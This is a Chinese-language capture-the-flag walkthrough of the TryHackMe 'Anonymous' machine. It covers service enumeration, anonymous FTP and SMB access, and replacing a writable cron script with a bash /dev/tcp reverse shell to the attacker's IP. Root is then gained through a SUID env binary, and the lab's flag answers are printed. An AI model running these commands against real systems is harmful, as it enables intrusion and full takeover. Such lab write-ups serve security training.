【Tryhackme】Anonymous(FTP匿名登录,Cron任务反弹shell,SUID提权:env)
服务发现
┌──(root?kali)-[~/tryhackme/Anonymous] └─# nmap -sV -Pn 10.10.249.116 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-18 06:12 EDT Nmap scan report for 10.10.249.116 Host is up (0.31s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.67 seconds
分析
只有4个服务端口,没有http,可以先回答前面三个问题
问题1:Enumerate the machine. How many ports are open?
答案:4问题2:What service is running on port 21?
答案:ftp问题3:What service is running on ports 139 and 445?
答案:smb
渗透smb服务,使用enum4linux
┌──(root?kali)-[~/tryhackme/Anonymous] └─# enum4linux 10.10.249.116 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Oct 18 06:29:35 2021 ========================== | Target Information | ========================== Target ........... 10.10.249.116 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ========================================== | Share Enumeration on 10.10.249.116 | ========================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers pics Disk My SMB Share Directory for Pics IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu)) SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.249.116 //10.10.249.116/print$ Mapping: DENIED, Listing: N/A //10.10.249.116/pics Mapping: OK, Listing: OK //10.10.249.116/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing *
我们看到有一个pics
文件夹开启了分享
问题4:There’s a share on the user’s computer. What’s it called?
答案:pics
我们用smbclient
工具登录到这个文件夹,把上面的文件下载下来分析
┌──(root?kali)-[~/tryhackme/Anonymous] └─# smbclient //10.10.249.116/pics 130 ⨯ Enter WORKGROUProot's password: Try "help" to get a list of possible commands. smb: > ls . D 0 Sun May 17 07:11:34 2020 .. D 0 Wed May 13 21:59:10 2020 corgo2.jpg N 42663 Mon May 11 20:43:42 2020 puppos.jpeg N 265188 Mon May 11 20:43:42 2020
把jpg文件下载到本地,用exiftool
命令分析,可以获得文件的描述内容Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung..Adobe Stock #118102236
文件的作者:Tatyana Panova
在这里我们起码可以拿到3个用户名:
Denise Flaim Susan Sprung Tatyana Panova
尝试用hrdra爆破上面用户名的ssh,但是无所获。。。
ftp可以匿名登录,把文件全部下载到本地分析
┌──(root?kali)-[~/tryhackme/Anonymous] └─# ftp 10.10.249.116 Connected to 10.10.249.116. 220 NamelessOne's FTP Server! Name (10.10.249.116:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts 226 Directory send OK. ftp> cd scripts 250 Directory successfully changed. ftp> ls -alh 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 111 113 4096 Jun 04 2020 . drwxr-xr-x 3 65534 65534 4096 May 13 2020 .. -rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh -rw-rw-r-- 1 1000 1000 1935 Oct 18 10:20 removed_files.log -rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
一个个文件分析
文件1:clean.sh
:
┌──(root?kali)-[~/tryhackme/Anonymous] └─# cat clean.sh #!/bin/bash tmp_files=0 echo $tmp_files if [ $tmp_files=0 ] then echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log else for LINE in $tmp_files; do rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done fi
就是一个清理/tmp
文件夹下的脚本,不过那个判断貌似永远不会进入else分支,清理记录写入removed_files.log
.暴露了FTP的目录是 /var/ftp
文件2removed_files.log
是上面脚本的记录,没有有用的信息
文件3:to_do.txt
┌──(root?kali)-[~/tryhackme/Anonymous] └─# cat to_do.txt I really need to disable the anonymous login...it's really not safe
我们看到clean.sh
的权限对于匿名用户是可读可写的,清理临时文件夹这种动作也有可能是某种定时任务,如果我们可以替换这个bash文件,那么我们就有可能拿到反弹shell
验证
为了验证bash脚本是一个定时任务,我们修改bash的脚本为:
#!/bin/bash echo "$(date)" >> /var/ftp/scripts/removed_files.log
如果新生成的数据显示了日期,那么就可以证实我们的猜想,而且比对两次时间日期可以得到定时任务的频率
上传新的bash
ftp> put /root/tryhackme/Anonymous/clean.sh ./clean.sh local: /root/tryhackme/Anonymous/clean.sh remote: ./clean.sh 200 PORT command successful. Consider using PASV. 150 Ok to send data. 226 Transfer complete. 65 bytes sent in 0.00 secs (793.4570 kB/s)
等两分钟后,下载日志
┌──(root?kali)-[~/tryhackme/Anonymous] └─# cat removed_files.log Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Running cleanup script: nothing to delete Tue Oct 19 07:11:01 UTC 2021 Tue Oct 19 07:12:01 UTC 2021
最后两行果然是打印了我们修改的日志信息,而且由时间可以看出定时任务是一分钟执行一次
shell
编辑clean.sh
,payload如下
#!/bin/bash bash -i >& /dev/tcp/10.13.21.169/4242 0>&1
本地开启监听,拿到初始shell
┌──(root?kali)-[~] └─# nc -lnvp 4242 listening on [any] 4242 ... connect to [10.13.21.169] from (UNKNOWN) [10.10.249.116] 59716 bash: cannot set terminal process group (1283): Inappropriate ioctl for device bash: no job control in this shell namelessone@anonymous:~$ id id uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) namelessone@anonymous:~$ whoami whoami namelessone namelessone@anonymous:~$
在user目录拿到user.txt
ls pics user.txt cat user.txt 90d6f992585815ff991e68748c414740
问题5:user.txt
答案:90d6f992585815ff991e68748c414740
提权
把linpeas传到靶机,枚举靶机的提权漏洞,发现一个可以提权的SUID:env
利用env提权,拿到root.txt
/usr/bin/env /bin/sh -p whoami root cat /root/root.txt 4d930091c31a622a7ed10f27999af363
问题6:root.txt
答案:4d930091c31a622a7ed10f27999af363
另外,shell用户本身在lxd组用户,关于lxd组用户提权,我在这台靶机里有详细记录,这里不再演示。
[温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]